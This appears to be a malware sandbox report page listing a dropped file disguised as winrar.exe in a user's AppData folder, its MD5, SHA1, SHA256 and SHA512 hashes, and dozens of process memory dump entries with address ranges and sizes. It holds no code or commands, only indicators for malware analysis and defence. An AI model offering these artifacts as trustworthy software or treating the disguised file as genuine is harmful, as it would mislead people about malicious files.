9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
memory/400-128-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/464-152-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download
memory/1116-109-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1736-164-0x00000222A74F0000-0x00000222A7512000-memory.dmp

Filesize
136KB

Download
memory/1736-176-0x00000222A7780000-0x00000222A779C000-memory.dmp

Filesize
112KB

Download
memory/1736-177-0x00000222A7770000-0x00000222A777A000-memory.dmp

Filesize
40KB

Download
memory/1736-178-0x00000222A77A0000-0x00000222A77A8000-memory.dmp

Filesize
32KB

Download
memory/1736-179-0x00000222A77B0000-0x00000222A77BA000-memory.dmp

Filesize
40KB

Download
memory/2204-68-0x0000000007970000-0x000000000798E000-memory.dmp

Filesize
120KB

Download
memory/2204-72-0x0000000007B40000-0x0000000007B4A000-memory.dmp

Filesize
40KB

Download
memory/2204-74-0x0000000007CD0000-0x0000000007CE1000-memory.dmp

Filesize
68KB

Download
memory/2204-75-0x0000000007D00000-0x0000000007D0E000-memory.dmp

Filesize
56KB

Download
memory/2204-76-0x0000000007D10000-0x0000000007D24000-memory.dmp

Filesize
80KB

Download
memory/2204-77-0x0000000007D50000-0x0000000007D6A000-memory.dmp

Filesize
104KB

Download
memory/2204-78-0x0000000007D40000-0x0000000007D48000-memory.dmp

Filesize
32KB

Download
memory/2204-70-0x0000000008120000-0x000000000879A000-memory.dmp

Filesize
6.5MB

Download
memory/2204-69-0x0000000007990000-0x0000000007A33000-memory.dmp

Filesize
652KB

Download
memory/2204-58-0x0000000070010000-0x000000007005C000-memory.dmp

Filesize
304KB

Download
memory/2204-57-0x0000000006D60000-0x0000000006D92000-memory.dmp

Filesize
200KB

Download
memory/2324-188-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/2336-24-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/2336-41-0x0000000006CD0000-0x0000000006CEA000-memory.dmp

Filesize
104KB

Download
memory/2336-21-0x0000000002EB0000-0x0000000002EE6000-memory.dmp

Filesize
216KB

Download
memory/2336-22-0x0000000005A90000-0x00000000060B8000-memory.dmp

Filesize
6.2MB

Download
memory/2336-23-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/2336-37-0x0000000006210000-0x0000000006564000-memory.dmp

Filesize
3.3MB

Download
memory/2336-25-0x00000000059F0000-0x0000000005A12000-memory.dmp

Filesize
136KB

Download
memory/2336-26-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/2336-43-0x0000000008020000-0x00000000085C4000-memory.dmp

Filesize
5.6MB

Download
memory/2336-27-0x00000000061A0000-0x0000000006206000-memory.dmp

Filesize
408KB

Download
memory/2336-42-0x0000000006D20000-0x0000000006D42000-memory.dmp

Filesize
136KB

Download
memory/2336-20-0x00000000736DE000-0x00000000736DF000-memory.dmp

Filesize
4KB

Download
memory/2336-114-0x00000000736DE000-0x00000000736DF000-memory.dmp

Filesize
4KB

Download
memory/2336-117-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/2336-40-0x00000000079A0000-0x0000000007A36000-memory.dmp

Filesize
600KB

Download
memory/2336-38-0x00000000067A0000-0x00000000067BE000-memory.dmp

Filesize
120KB

Download
memory/2336-129-0x00000000736D0000-0x0000000073E80000-memory.dmp

Filesize
7.7MB

Download
memory/2336-39-0x00000000067C0000-0x000000000680C000-memory.dmp

Filesize
304KB

Download
memory/2396-125-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/2396-123-0x00007FF8BDAE0000-0x00007FF8BDAE2000-memory.dmp

Filesize
8KB

Download
memory/2396-122-0x00007FF8BDAD0000-0x00007FF8BDAD2000-memory.dmp

Filesize
8KB

Download
memory/2452-217-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2452-221-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2452-218-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2452-214-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2452-215-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2452-216-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2488-209-0x00000270283B0000-0x00000270283BA000-memory.dmp

Filesize
40KB

Download
memory/2488-207-0x00000270283C0000-0x00000270283DC000-memory.dmp

Filesize
112KB

Download
memory/2488-208-0x00000270283E0000-0x0000027028495000-memory.dmp

Filesize
724KB

Download
memory/2488-210-0x0000027028640000-0x000002702865A000-memory.dmp

Filesize
104KB

Download
memory/2488-211-0x0000027028620000-0x0000027028626000-memory.dmp

Filesize
24KB

Download
memory/3488-243-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download
memory/3576-100-0x0000000075CD0000-0x0000000075EE5000-memory.dmp

Filesize
2.1MB

Download
memory/3576-98-0x00007FF8BD8D0000-0x00007FF8BDAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3576-97-0x00000000056E0000-0x0000000005AE0000-memory.dmp

Filesize
4.0MB

Download
memory/3576-96-0x00000000056E0000-0x0000000005AE0000-memory.dmp

Filesize
4.0MB

Download
memory/3576-110-0x0000000000400000-0x000000000285C000-memory.dmp

Filesize
36.4MB

Download
memory/4164-83-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/4620-103-0x00000000020C0000-0x00000000024C0000-memory.dmp

Filesize
4.0MB

Download
memory/4620-101-0x00000000003C0000-0x00000000003C9000-memory.dmp

Filesize
36KB

Download
memory/4620-106-0x0000000075CD0000-0x0000000075EE5000-memory.dmp

Filesize
2.1MB

Download
memory/4620-104-0x00007FF8BD8D0000-0x00007FF8BDAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4668-234-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-232-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-226-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-229-0x0000016114010000-0x0000016114030000-memory.dmp

Filesize
128KB

Download
memory/4668-228-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-233-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-222-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-223-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-231-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-230-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-227-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-225-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-224-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-238-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4668-239-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4920-154-0x0000000000400000-0x0000000002853000-memory.dmp

Filesize
36.3MB

Download